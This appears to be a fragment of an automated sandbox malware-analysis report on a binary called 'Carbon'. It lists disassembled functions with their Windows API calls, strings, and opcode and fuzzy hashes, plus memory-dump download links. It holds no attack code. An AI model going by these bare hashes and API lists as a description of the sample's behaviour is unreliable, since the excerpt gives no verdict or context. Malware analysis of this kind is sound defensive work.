                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: ed54f6d0f4a44d7f2073a6f25db54ee7f178e7782c72e8ea9b21b043c8e29608
                                                            • Instruction ID: d24bdd625a6146cfa0e1034fbc6a4383cff8b31d2139a496410f6213a3324b2a
                                                            • Opcode Fuzzy Hash: ed54f6d0f4a44d7f2073a6f25db54ee7f178e7782c72e8ea9b21b043c8e29608
                                                            • Instruction Fuzzy Hash: 1411457561120CBFEB208F68C884EFFBBB8FF12754B10542AB901E7210E2719E50AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FE570 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 0094384D
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: 6b29a0c6e4a47548c854ad2f9119313cc92266f90d340db3454035c0efb5ea1d
                                                            • Instruction ID: b740cb080bffca32ddff174c4d5d93f825f82c797904c1a767be7e1103e22439
                                                            • Opcode Fuzzy Hash: 6b29a0c6e4a47548c854ad2f9119313cc92266f90d340db3454035c0efb5ea1d
                                                            • Instruction Fuzzy Hash: F8C28A71A00209DFCB24DF68C881BBDB7B1FF58314F248169EA45AB3A1D775AD81CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FF1E0 Relevance: 5.7, APIs: 3, Instructions: 1236COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00900492
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID:
                                                            • API String ID: 1385522511-0
                                                            • Opcode ID: 5c50c3c1c8ae7f0f14e50501d0e09d1e861c667ef1b14c1b5596263020d167fe
                                                            • Instruction ID: cc6c5506af06f33dd021b88ccead61798adb2b41b58670bd601f1d8cc1716e13
                                                            • Opcode Fuzzy Hash: 5c50c3c1c8ae7f0f14e50501d0e09d1e861c667ef1b14c1b5596263020d167fe
                                                            • Instruction Fuzzy Hash: DAB26D74A08345CFC724CF28C480B2AB7E1FF99704F14896DEA998B392D775E941DB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0091012B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009109B8
                                                              • Part of subcall function 009135F4: RaiseException.KERNEL32(?,?,?,009109DA,?,00000000,?,?,?,?,?,?,009109DA,00000000,009B9728,00000000), ref: 00913654
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 009109D5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: ad91649a62b17d109f06df3216e5dd174eefeabcf57f0f19c518263c110bc564
                                                            • Instruction ID: 5bc4ed476dce9d04837162918e2ebd27e64dcd06763cc7aedd50fd779c072b7e
                                                            • Opcode Fuzzy Hash: ad91649a62b17d109f06df3216e5dd174eefeabcf57f0f19c518263c110bc564
                                                            • Instruction Fuzzy Hash: 4CF0C834B0430CB7DF00BAA4E866ADD7BAC5EC0360F504160B928964E2EBB2DAC5C5C0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009786E0 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00978A7C
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00978A83
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00978C64
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                            • String ID:
                                                            • API String ID: 146820519-0
                                                            • Opcode ID: 606706b32b89ef1b880a18632cc37bfab0acad5588a73f75d8f5e18d82aad150
                                                            • Instruction ID: 33295b159bd4471cf292df06e00fccafcd628c4359615fffa678a6cafd387951
                                                            • Opcode Fuzzy Hash: 606706b32b89ef1b880a18632cc37bfab0acad5588a73f75d8f5e18d82aad150
                                                            • Instruction Fuzzy Hash: 30126E72A083019FC714DF28C485B6ABBE5FF88314F14895DE9898B392DB35ED45CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0097981D Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_strcat
                                                            • String ID:
                                                            • API String ID: 306214811-0
                                                            • Opcode ID: ada1c858150e3f615ebc7c78a2be55792361c202feb6f59255cc32d3ca46a930
                                                            • Instruction ID: 5c7584e4b3eb74aaec1f4d2142346cdc65775802ffd6516551313603511a852f
                                                            • Opcode Fuzzy Hash: ada1c858150e3f615ebc7c78a2be55792361c202feb6f59255cc32d3ca46a930
                                                            • Instruction Fuzzy Hash: B1A16C31604209EFCB18DF18C591AA9BBB5FF85314B60C4ADE94A9F292DB35ED41CF81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F2C6F Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F2ABE
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000010,00000000), ref: 008F2AC6
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F2AD1
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F2ADC
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000011,00000000), ref: 008F2AE4
                                                              • Part of subcall function 008F2A8D: MapVirtualKeyW.USER32(00000012,00000000), ref: 008F2AEC
                                                              • Part of subcall function 008F2AF5: RegisterWindowMessageW.USER32(00000004,?,008F2E40), ref: 008F2B4D
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008F2EE6
                                                            • OleInitialize.OLE32 ref: 008F2F04
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00933018
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            • Opcode ID: c25a8b804a68e20a274f02f28cdf6800422e795d06364ad56b30da96457fe67a
                                                            • Instruction ID: eaabbff81c52f586d77aecc3437f0b0e9d8f85663f60bb954790d59413b66f65
                                                            • Opcode Fuzzy Hash: c25a8b804a68e20a274f02f28cdf6800422e795d06364ad56b30da96457fe67a
                                                            • Instruction Fuzzy Hash: 45718BB0D293858FC398EF79ADA9E263BE1FB58314750812EE109C73B1EB704445AF52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00921EA0 Relevance: 4.6, APIs: 3, Instructions: 115COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: d0ad50b6681a44932592b49785b36bb8326c73735b898fc436ed1415267caf86
                                                            • Instruction ID: 7702ea5001cc5737cf36ac3910e38558b19680bb1ba63165c5c68c25049b3d71
                                                            • Opcode Fuzzy Hash: d0ad50b6681a44932592b49785b36bb8326c73735b898fc436ed1415267caf86
                                                            • Instruction Fuzzy Hash: 6E319C37900234ABCB24EF68F841AFE73ACEF84760B654459FC04DB288EB315D02C290
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F5BA7 Relevance: 4.6, APIs: 3, Instructions: 103COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000001,?,00000000), ref: 008F5C4E
                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 008F5C5E
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: 20cd0d9c406f0de3616bf56c63af59ddf23de83f5350bb02f556e3259d3dadbe
                                                            • Instruction ID: fe3a1e3b79fd2842cf976df34d0ebae4fb9e6c97cf0f799df322e4b102c535f8
                                                            • Opcode Fuzzy Hash: 20cd0d9c406f0de3616bf56c63af59ddf23de83f5350bb02f556e3259d3dadbe
                                                            • Instruction Fuzzy Hash: 5C316C31A00A09EFDB14CF28C880BA9B7B4FB44B14F148629EA15D7640C771FE94CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0090FC73 Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008F5033: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008F5123
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 0090FCFC
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0090FD0B
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0094FBCA
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer$Kill
                                                            • String ID:
                                                            • API String ID: 3500052701-0
                                                            • Opcode ID: 0eeac1eeeaa90ab7596f82a014c2b1a2d264e0af81990d9d29e63c82a26c0917
                                                            • Instruction ID: 88c728e2a94814517dd955eaff017cc474312545b0a4d4b2e26721719c4a1df1
                                                            • Opcode Fuzzy Hash: 0eeac1eeeaa90ab7596f82a014c2b1a2d264e0af81990d9d29e63c82a26c0917
                                                            • Instruction Fuzzy Hash: D3318470904794AFEB32CF24C865FE6BBECEB02708F1404AED5DD97281C7745A858B11
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009289FE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0092891C,?,009B9CB8,0000000C), ref: 00928A54
                                                            • GetLastError.KERNEL32(?,0092891C,?,009B9CB8,0000000C), ref: 00928A5E
                                                            • __dosmaperr.LIBCMT ref: 00928A89
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                            • String ID:
                                                            • API String ID: 490808831-0
                                                            • Opcode ID: 5b0c70aac207933c4813190faa84eef7eae25563a14b8b3fb2b734a36c2a6d7c
                                                            • Instruction ID: e2e30df611d00da558bb99719db282a40c999f9c26bbb8309a92cb900c67bf48
                                                            • Opcode Fuzzy Hash: 5b0c70aac207933c4813190faa84eef7eae25563a14b8b3fb2b734a36c2a6d7c
                                                            • Instruction Fuzzy Hash: F7014E3362B1705AD6246738B845B7F674E8BC2734F2A411BF814DB1CBDE708C8192A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009296DB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,00934667,?,00000000,00000000,?,0092978A,?,?,00000002,00000000), ref: 00929714
                                                            • GetLastError.KERNEL32(?,0092978A,?,?,00000002,00000000,?,00925EB1,?,00000000,00000000,00000002,?,?,?), ref: 0092971E
                                                            • __dosmaperr.LIBCMT ref: 00929725
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                            • String ID:
                                                            • API String ID: 2336955059-0
                                                            • Opcode ID: a70a99fa48fdf4ac493177072a0bb0b17b1348dc1407bec8b92c29d7e12fc784
                                                            • Instruction ID: 960355086bd1476d4d74a151acb9ddd0ab625277b5ba23c618a10da84e2b025f
                                                            • Opcode Fuzzy Hash: a70a99fa48fdf4ac493177072a0bb0b17b1348dc1407bec8b92c29d7e12fc784
                                                            • Instruction Fuzzy Hash: 18012832A35124ABCF059F99EC05D6E3B2EDF85330F240209F8109B2D4EA70DD01DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0092D191 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0092D195
                                                            • _free.LIBCMT ref: 0092D1CE
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0092D1D5
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free_free
                                                            • String ID:
                                                            • API String ID: 2716640707-0
                                                            • Opcode ID: 1da596e0670bc48de496a3165561cf7d074773c8782dd3d3520868b0d95e2574
                                                            • Instruction ID: 2cc6a1f31421cd714963b1b426ba0d7a198490ef67abc978e7e22f3b559b9880
                                                            • Opcode Fuzzy Hash: 1da596e0670bc48de496a3165561cf7d074773c8782dd3d3520868b0d95e2574
                                                            • Instruction Fuzzy Hash: B4E06D3754E5353BA22636297C89FAF2A1DDFC27A57250026F5088669BEE248D0241E2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008FE0D8 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TranslateMessage.USER32(?), ref: 008FE11B
                                                            • DispatchMessageW.USER32(?), ref: 008FE129
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FE13F
                                                            • Sleep.KERNEL32(0000000A), ref: 008FE151
                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 0094225F
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                            • String ID:
                                                            • API String ID: 3288985973-0
                                                            • Opcode ID: b744bd435570bcc2348d95c2856c2aa748d287cdd258385e8d412c352d49b1a8
                                                            • Instruction ID: 56f66dad97070746950146ab52725f4ef7a04cf0a1a4c7e2f2c89e1e33e84689
                                                            • Opcode Fuzzy Hash: b744bd435570bcc2348d95c2856c2aa748d287cdd258385e8d412c352d49b1a8
                                                            • Instruction Fuzzy Hash: 5FF05E705193459BEB349B708C49FEA33ADFB84314F504929F719D30D0DB709488EB16
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 009019C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00901EA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            • Opcode ID: 4b07ed9f7db2f965933cdd0932d717c782c7f992f4dd52829f62de5bbd8d633e
                                                            • Instruction ID: 2de4e9b639f6cfe2e7ed4bac3224d5f9cd7c1405f57d58235b71228c1a89d1af
                                                            • Opcode Fuzzy Hash: 4b07ed9f7db2f965933cdd0932d717c782c7f992f4dd52829f62de5bbd8d633e
                                                            • Instruction Fuzzy Hash: AB226AB06082019FD714DF24C890B2ABBF5FF89314F24895DF59A8B3A1D775E985CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00900830 Relevance: 3.6, APIs: 2, Instructions: 643COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000001D.00000002.2969491385.00000000008F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 008F0000, based on PE: true
                                                            • Associated: 0000001D.00000002.2969462690.00000000008F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.000000000098D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969561428.00000000009B3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969629107.00000000009BD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                            • Associated: 0000001D.00000002.2969659211.00000000009C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_29_2_8f0000_Carbon.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0d00f2497ef626ca4872bc2442516419c495806c2f2f9f334ff6cb992623b993
                                                            • Instruction ID: d99bc24b8444f3e5d09c28d87c30079c431ffa73f8c1e0fe9acbf3e64691b13d
                                                            • Opcode Fuzzy Hash: 0d00f2497ef626ca4872bc2442516419c495806c2f2f9f334ff6cb992623b993
                                                            • Instruction Fuzzy Hash: A432D130A00608DFDB24EFA4C881FAEB7B5FF84310F158959E956A7292D735ED80CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 008F31C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00933391
                                                              • Part of subcall function 008F3FF7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008F3E0E,?,?,00932A98,?,?,00000100,00000000,00000000,CMDLINE), ref: 008F4017
                                                              • Part of subcall function 008F318A: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 008F31A9
                                                            Strings
